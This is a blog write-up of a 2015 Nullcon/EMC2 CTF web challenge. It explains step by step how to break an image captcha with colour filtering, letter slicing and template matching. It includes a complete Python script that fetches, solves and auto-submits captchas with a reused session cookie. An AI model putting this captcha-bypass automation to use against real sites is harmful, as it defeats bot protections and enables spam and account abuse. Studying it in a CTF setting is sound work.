Fb1h2s aka Rahul Sasi's Blog

Cracking a Captcha: Nullcon | EMC2 CTF 2015

Last week the EMC2/nullcon CTF wrapped up. Even though I really wanted to, I did not have enough time to play the CTF. I was (and still am) busy working on my "Hacking Drones" research for Nullcon.
http://nullcon.net/website/goa-15/sp...rahul-sasi.php


Last year I was one of the top 30 finalists of the EMC2 Defenders League and stood 5th in the final ranking.
https://www.facebook.com/photo.php?f...type=1&theater
https://twitter.com/varunsharma14/st...65888308039680


Anyway, on Sunday night I got a bit bored with drones and decided to take a sneak peek at the CTF, but by that time the winners had been declared and the scoreboard was closed. I went straight to my favorite categories, web and reversing, and decided to solve one of those challenges. Web 5 was a captcha solver for 500 points, and I decided that would be easy.

The challenge was to break as many captchas as possible and submit them using a given session token within a time frame of 2 minutes.

Analyzing the captcha, we can easily see that there are 5 clearly visible colours:
Black == background
Dark violet == dots
Gray == lines
Light violet shades == letters

[Image: imagedemo.png (sample captcha)]


From the look of it, it was an easily crackable captcha.

This is a small AI problem: we need to create a program that can recognize these captchas, and we need to teach it what is right and what is wrong. So the first step is to build a training data set that serves as the input for our captcha solver. People use different methods for this, such as neural networks or vector space search. In our current situation we do not have a complicated data set: the captcha is simple and contains only letters [a-z, A-Z].


Building the Training Data set.


Step 1 :

The captcha image we are provided with is a PNG file in RGBA mode [Red Green Blue Alpha] (ref: en.wikipedia.org/wiki/RGBA_color_space). We have to bring it down to a palette of at most 256 colours, and the easiest way to do that is to convert the image from PNG to a GIF-style palette image. We will use the Python PIL module to do that.

captcha_image = captcha_image.convert("P")

The next step is to find the image's pixel concentration: list each colour together with its pixel count.

We can use PIL's histogram() for this, and we get the following.

[-] Image pixel concentration

0 8344
190 938
53 301
96 184
204 113
205 69
60 24
210 14
211 7
95 4

Here 0 stands for black and has the highest pixel count, 8344, followed by colour 190. At this point I assumed that colours 204 and 205 are the ones used for the captcha letters.
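The ranking above is just a frequency count over palette indices. The sketch below is an illustration, not the code from this post: it assumes the palette-mode image has already been flattened into a plain Python list of colour indices, so it runs without any imaging library. The helper name top_colours and the toy pixel data are made up for the example.

```python
from collections import Counter

def top_colours(pixels, n=10):
    """Return the n most common palette indices as (colour, count) pairs."""
    return Counter(pixels).most_common(n)

# Toy data (hypothetical): mostly background (0), some noise (190, 53),
# and a few letter pixels (204, 205).
pixels = [0] * 20 + [190] * 6 + [53] * 3 + [204] * 2 + [205]

for colour, count in top_colours(pixels, n=5):
    print(colour, count)
```

On a real captcha, the background and the noise dominate the top of the list, and the letter colours show up as the next tier down.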

Step 2:

Remove the noise from the image. This is easy, as we can simply drop every pixel that is not one of the captcha letter colours.

Plot the letter-coloured pixels onto a new image and ignore everything else.

if pix == 204 or pix == 205:  # these are the numbers to get
    captcha_filtered.putpixel((y, x), 0)

Now we get an image whose background is white, with all the noise removed.
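The same filter can be sketched on a plain grid of palette indices, which makes the effect easy to see. This is a minimal illustration under assumptions: the image is represented as a list of rows rather than a PIL image, and the names filter_noise, LETTER_COLOURS, BACKGROUND and INK are hypothetical. The colour values 204 and 205 are the ones assumed in the text.

```python
LETTER_COLOURS = {204, 205}   # palette indices assumed to be the letters
BACKGROUND, INK = 255, 0      # white background, black letter pixels

def filter_noise(grid, keep=LETTER_COLOURS):
    """Return a new grid: letter pixels become INK, everything else BACKGROUND."""
    return [[INK if pix in keep else BACKGROUND for pix in row] for row in grid]

# Toy 3x4 "image" (hypothetical) mixing background, noise and letter colours.
grid = [
    [0, 190, 204, 0],
    [53, 205, 204, 96],
    [0, 0, 205, 190],
]
clean = filter_noise(grid)
for row in clean:
    print(row)
```

Building a fresh grid instead of editing in place mirrors the approach in the post, where the letter pixels are drawn onto a new, initially white image.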

Step 3:

The next step is to find the captcha letter spacing and slice each character out of the captcha.

This is easy, as the new image contains only the background (255) and the letter pixels (originally colours 204 and 205).


Horizontal positions where the letters start and stop:

|a|s|d|f|e

Image 1 Line Spacing is [(5, 13), (35, 43), (65, 73), (95, 102), (125, 133), (155, 163)]
Image 2 Line Spacing is [(5, 13), (35, 43), (66, 73), (96, 102), (125, 133), (155, 163)]

Each letter in the captcha occupies almost the same space.
Cut out each character and place the pieces in a folder.
Rename each letter image file to the letter it shows.
Now we have a folder of sliced letters, each named after its letter.
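The column scan behind those start/stop pairs can be sketched as follows. This is an illustration under assumptions, not the post's exact code: the filtered image is a list of rows with 255 as background, the function names letter_spans and crop_columns are hypothetical, and unlike the script in this post the sketch also closes a letter that touches the right edge.

```python
BACKGROUND = 255

def letter_spans(grid):
    """Return (start, end) column pairs; end is the first blank column after a letter."""
    spans, start = [], None
    width = len(grid[0])
    for col in range(width):
        has_ink = any(row[col] != BACKGROUND for row in grid)
        if has_ink and start is None:
            start = col                      # first inked column of a letter
        elif not has_ink and start is not None:
            spans.append((start, col))       # blank column ends the letter
            start = None
    if start is not None:                    # letter touching the right edge
        spans.append((start, width))
    return spans

def crop_columns(grid, start, end):
    """Cut columns start..end-1 out of every row."""
    return [row[start:end] for row in grid]

W, K = 255, 0
grid = [
    [W, K, K, W, W, K, W],
    [W, K, W, W, W, K, W],
    [W, K, K, W, W, K, W],
]
spans = letter_spans(grid)
letters = [crop_columns(grid, s, e) for s, e in spans]
print(spans)
```

Each cropped piece would then be saved under the name of the letter it shows, which is a manual labelling step.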


Final Solution algorithm:

The final algorithm to solve the captcha would be:

a) Read a new captcha and the session cookie
b) Filter the noise out
c) Slice the filtered captcha and extract each letter
d) Compare each letter with those kept in the letter folder and find the best match
e) The best match is the captcha letter
f) Continue for all letters in the captcha
g) Submit the full captcha along with the session cookie to the application
h) Fetch a new captcha with the session cookie, go to step b

Compare two images in Python:

There are multiple ways to compare images in Python.

1) Calculate the root mean square difference
ref: http://code.activestate.com/recipes/...ng-two-images/

2) Euclidean distance
3) Normalized cross-correlation

Normalized cross-correlation is an option, but the solver in this post takes a simpler route: it sums the absolute per-pixel difference.

The PIL module's ImageChops.difference returns the absolute value of the pixel-by-pixel difference between the two images.

ImageChops.difference(image1, image2) ⇒ image

out = abs(image1 - image2)

Our images have the same shape and size, so this is the best bet.
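To make the options above concrete, here is a minimal pure-Python sketch of the metrics on small grayscale grids. It is an illustration under assumptions: images are lists of rows of equal size, all function names are hypothetical, and only sum_abs_diff corresponds to what the solver in this post does with ImageChops.difference. The other metrics are shown for comparison.

```python
import math

def flatten(img):
    return [p for row in img for p in row]

def sum_abs_diff(a, b):
    """Sum of absolute per-pixel differences (lower is more similar)."""
    return sum(abs(x - y) for x, y in zip(flatten(a), flatten(b)))

def euclidean(a, b):
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(flatten(a), flatten(b))))

def rms_diff(a, b):
    """Root mean square difference: Euclidean distance scaled by pixel count."""
    return euclidean(a, b) / math.sqrt(len(flatten(a)))

def ncc(a, b):
    """Normalized cross-correlation in [-1, 1] (higher is more similar)."""
    fa, fb = flatten(a), flatten(b)
    ma, mb = sum(fa) / len(fa), sum(fb) / len(fb)
    da, db = [x - ma for x in fa], [y - mb for y in fb]
    denom = math.sqrt(sum(x * x for x in da) * sum(y * y for y in db))
    return sum(x * y for x, y in zip(da, db)) / denom if denom else 0.0

def best_match(unknown, templates):
    """Return the template name with the smallest summed absolute difference."""
    return min(templates, key=lambda name: sum_abs_diff(unknown, templates[name]))

W, K = 255, 0
templates = {
    "L": [[K, W, W], [K, W, W], [K, K, K]],
    "T": [[K, K, K], [W, K, W], [W, K, W]],
}
unknown = [[K, W, W], [K, W, W], [K, K, W]]   # an "L" with one pixel missing
print(best_match(unknown, templates))
```

With clean, equally sized letter crops, the cheap summed difference is usually enough to separate the candidates, which is why the more elaborate metrics are not needed here.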


Python Code:
from PIL import Image, ImageChops
from operator import itemgetter
import urllib2, hashlib, time, urllib
import cStringIO, glob

# we have kept all our letters in this folder
files_names = glob.glob("/root/ctf/let/*.*")

# holds one candidate letter and its summed pixel difference
class Fit:
    letter = None
    difference = 0

# we need to get the captcha and, at the same time, the session cookie,
# and use that cookie for every solved captcha request
response = urllib2.urlopen('http://54.165.191.231/imagedemo.php')
cookie = response.headers['Set-Cookie']
#print cookie

# let's make (almost) 500 requests and read each captcha
for attempt in range(1, 500):
    captcha = ""
    opener = urllib2.build_opener()
    opener.addheaders = [
        ('Accept', 'application/json, text/javascript, */*; q=0.01'),
        ('Referer', 'http://www.garag4hackers.com'),
        ('Cookie', cookie),
    ]
    response = opener.open('http://54.165.191.231/imagedemo.php')
    length = response.headers['content-length']

    # read the captcha; the filtered image is saved under its content length
    print "[-] Image Content length " + length
    image_read = response.read()

    # cStringIO to create a file-like object from memory
    #image_read = Image.open("/root/ctf/u.png")
    image_read = cStringIO.StringIO(image_read)
    captcha_image = Image.open(image_read)
    #im = Image.open("/root/ctf/de")
    captcha_image = captcha_image.convert("P")
    temp = {}
    captcha_filtered = Image.new("P", captcha_image.size, 255)

    #print im.histogram()
    his = captcha_image.histogram()
    values = {}
    for i in range(256):
        values[i] = his[i]

    print "[-] Image pixel concentration \n"
    for color, concentrate in sorted(values.items(), key=itemgetter(1), reverse=True)[:10]:
        print color, concentrate

    # copy only the letter-coloured pixels onto the white image
    for x in range(captcha_image.size[1]):
        for y in range(captcha_image.size[0]):
            pix = captcha_image.getpixel((y, x))
            temp[pix] = pix
            if pix == 204 or pix == 205:  # these are the numbers to get
                captcha_filtered.putpixel((y, x), 0)

    captcha_filtered.save("/root/ctf/images/" + length + ".gif")

    inletter = False
    foundletter = False
    start = 0
    end = 0
    letters = []

    for y in range(captcha_filtered.size[0]):  # slice across
        for x in range(captcha_filtered.size[1]):  # slice down
            pix = captcha_filtered.getpixel((y, x))
            if pix != 255:
                inletter = True

        if foundletter == False and inletter == True:
            foundletter = True
            start = y

        if foundletter == True and inletter == False:
            foundletter = False
            end = y
            letters.append((start, end))

        inletter = False

    print "[-] Horizontal Position Where letter start and stop \n"
    print letters
    print "\n"

    count = 0
    for letter in letters:
        m = hashlib.md5()
        im3 = captcha_filtered.crop((letter[0], 0, letter[1], captcha_filtered.size[1]))

        # Match current letter with sample data
        #im3.save("/root/ctf/let/%s.gif"%(m.hexdigest()),quality=95)
        count += 1
        base = im3.convert('L')
        #print files_names

        best = Fit()
        for sample_path in files_names:
            #print sample_path
            current = Fit()
            current.letter = sample_path
            sample = Image.open(sample_path).convert('L').resize(base.size)
            difference = ImageChops.difference(base, sample)

            # sum the absolute difference over every pixel
            for x in range(difference.size[0]):
                for y in range(difference.size[1]):
                    current.difference += difference.getpixel((x, y))

            if not best.letter or best.difference > current.difference:
                best = current

        # final captcha decoded: "/root/ctf/let/" is 14 characters long,
        # so index 14 is the first character of the sample file name
        tmp = best.letter[14:15]
        captcha = captcha + tmp

    # let us post the captcha to the server along with the session token
    print "[+] Captcha is " + captcha
    url = 'http://54.165.191.231/verify.php'
    data = urllib.urlencode({'solution': captcha.strip(), 'Submit': 'Submit'})
    req = opener.open(url, data)
    response = req.read()
    print response

My program had a 97% success rate, and after 50 successful entries I got the flag.
GitHub Code: https://github.com/fb1h2s/captcha-cracker

Ref: http://www.boyter.org/decoding-captchas/